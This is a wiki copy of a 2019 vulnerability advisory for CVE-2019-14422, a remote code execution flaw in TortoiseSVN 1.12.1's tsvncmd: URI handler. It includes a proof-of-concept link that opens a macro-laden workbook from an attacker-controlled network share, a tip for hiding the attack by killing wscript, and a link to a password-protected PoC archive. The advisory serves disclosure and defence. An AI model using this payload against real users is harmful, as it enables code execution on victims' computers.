https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2019-14422_TortoiseSVN_1.12.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9ECVE-2019-14422 TortoiseSVN 1.12.1 遠程代碼執行漏洞 - Revision history2026-04-16T21:30:31ZRevision history for this page on the wikiMediaWiki 1.35.1https://pwnwiki.com/index.php?title=CVE-2019-14422_TortoiseSVN_1.12.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=2006&oldid=prevPwnwiki: Created page with "==EXP== <pre> Document Title: =============== TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability References (Source): ==================== https://www.vulnerability-l..."2021-05-02T04:26:28Z<p>Created page with "==EXP== <pre> Document Title: =============== TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability References (Source): ==================== https://www.vulnerability-l..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
Document Title:<br />
===============<br />
TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability<br />
<br />
<br />
References (Source):<br />
====================<br />
https://www.vulnerability-lab.com/get_content.php?id=2188<br />
<br />
Product:<br />
https://osdn.net/projects/tortoisesvn/storage/1.12.1/Application/TortoiseSVN-1.12.1.28628-x64-svn-1.12.2.msi/<br />
<br />
Ticket: https://groups.google.com/forum/#!forum/tortoisesvn<br />
<br />
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14422<br />
<br />
CVE-ID:<br />
=======<br />
CVE-2019-14422<br />
<br />
<br />
Release Date:<br />
=============<br />
2019-08-13<br />
<br />
<br />
Vulnerability Laboratory ID (VL-ID):<br />
====================================<br />
2188<br />
<br />
<br />
Common Vulnerability Scoring System:<br />
====================================<br />
8.8<br />
<br />
<br />
Vulnerability Class:<br />
====================<br />
Code Execution<br />
<br />
<br />
Current Estimated Price:<br />
========================<br />
4.000€ - 5.000€<br />
<br />
<br />
Product & Service Introduction:<br />
===============================<br />
TortoiseSVN is a really easy to use Revision control / version control /<br />
source control software for Windows.<br />
It is based on Apache Subversion (SVN); TortoiseSVN provides a nice and<br />
easy user interface for Subversion.<br />
It is developed under the GPL. Which means it is completely free for<br />
anyone to use, including in a commercial<br />
environment, without any restriction. The source code is also freely<br />
available, so you can even develop your<br />
own version if you wish to. Since it's not an integration for a specific<br />
IDE like Visual Studio, Eclipse or<br />
others, you can use it with whatever development tools you like, and<br />
with any type of file.<br />
<br />
(Copy of the about page: https://tortoisesvn.net/about.html )<br />
<br />
<br />
Abstract Advisory Information:<br />
==============================<br />
A vulnerability laboratory researcher (vxrl team) discovered a remote<br />
code execution vulnerability in the TortoiseSVN v1.12.1 software.<br />
<br />
<br />
Vulnerability Disclosure Timeline:<br />
==================================<br />
2019-08-13: Public Disclosure (Vulnerability Laboratory)<br />
<br />
Affected Product(s):<br />
====================<br />
TortoiseSVN<br />
Product: TortoiseSVN - Software 1.12.1<br />
<br />
<br />
Discovery Status:<br />
=================<br />
Published<br />
<br />
<br />
Exploitation Technique:<br />
=======================<br />
Remote<br />
<br />
<br />
Severity Level:<br />
===============<br />
High<br />
<br />
<br />
Authentication Type:<br />
====================<br />
Pre auth - no privileges<br />
<br />
<br />
User Interaction:<br />
=================<br />
Low User Interaction<br />
<br />
<br />
Disclosure Type:<br />
================<br />
Independent Security Research<br />
<br />
<br />
Technical Details & Description:<br />
================================<br />
A remote code execution vulnerability has been uncovered in the official<br />
TortoiseSVN v1.12.1 software.<br />
The vulnerability typ allows remote attackers to execute arbitrary codes<br />
to compromise a target computer system.<br />
<br />
The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff<br />
operation on Excel workbooks, which could be used to open remote<br />
workbooks without protection from macro security settings to execute<br />
arbitrary code.<br />
<br />
The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a<br />
customised diff on [file1] and [file2] based on the file extension.<br />
For xls files, it will execute the script `diff-xls.js` using wscript,<br />
which will open the two files for analysis without any macro<br />
security warning. An attacker can exploit this by putting a macro virus<br />
in a network drive, and force the victim to open the workbooks<br />
and execute the macro inside. Since the macro is triggered through<br />
wscript, to make the attack less visible, one could kill the wscript<br />
process and quit the excel program after the code was executed.<br />
<br />
<br />
Proof of Concept (PoC):<br />
=======================<br />
The vulnerability could be triggered by visiting a specially crafted URL<br />
via web browser.<br />
To reproduce the vulnerability, one could simply create a .url file or<br />
open the URL with a browsers,<br />
but a notification prompt may be shown for the latter case.<br />
<br />
<a<br />
href='tsvncmd:command:diff?path:VBoxSvrvv.xlsm?path2:VBoxSvrvw.xlsx'>Checkout<br />
the Repo with TortoiseSVN</a><br />
<br />
where VBoxSvrv is the remote network drive controlled by the attacker,<br />
v.xlsm is the macro virus and w.xlsx is just an empty excel workbook.<br />
<br />
Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar<br />
Password: 23vxrl23<br />
<br />
PoC: Video<br />
https://www.youtube.com/watch?v=spvRSC377vI<br />
<br />
<br />
Security Risk:<br />
==============<br />
The security risk of the remote code execution vulnerability in the<br />
software component is estimated as high.<br />
<br />
<br />
Credits & Authors:<br />
==================<br />
PingFanZettaKe [VXRL Team] -<br />
https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe<br />
<br />
<br />
Disclaimer & Information:<br />
=========================<br />
The information provided in this advisory is provided as it is without<br />
any warranty. Vulnerability Lab disclaims all warranties,<br />
either expressed or implied, including the warranties of merchantability<br />
and capability for a particular purpose. Vulnerability-Lab<br />
or its suppliers are not liable in any case of damage, including direct,<br />
indirect, incidental, consequential loss of business profits<br />
or special damages, even if Vulnerability-Lab or its suppliers have been<br />
advised of the possibility of such damages. Some states do<br />
not allow the exclusion or limitation of liability for consequential or<br />
incidental damages so the foregoing limitation may not apply.<br />
We do not approve or encourage anybody to break any licenses, policies,<br />
deface websites, hack into databases or trade with stolen data.<br />
<br />
Domains: www.vulnerability-lab.com www.vuln-lab.com <br />
www.vulnerability-db.com<br />
Services: magazine.vulnerability-lab.com<br />
paste.vulnerability-db.com infosec.vulnerability-db.com<br />
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab <br />
youtube.com/user/vulnerability0lab<br />
Feeds: vulnerability-lab.com/rss/rss.php<br />
vulnerability-lab.com/rss/rss_upcoming.php<br />
vulnerability-lab.com/rss/rss_news.php<br />
Programs: vulnerability-lab.com/submit.php<br />
vulnerability-lab.com/register.php<br />
vulnerability-lab.com/list-of-bug-bounty-programs.php<br />
<br />
</pre></div>Pwnwiki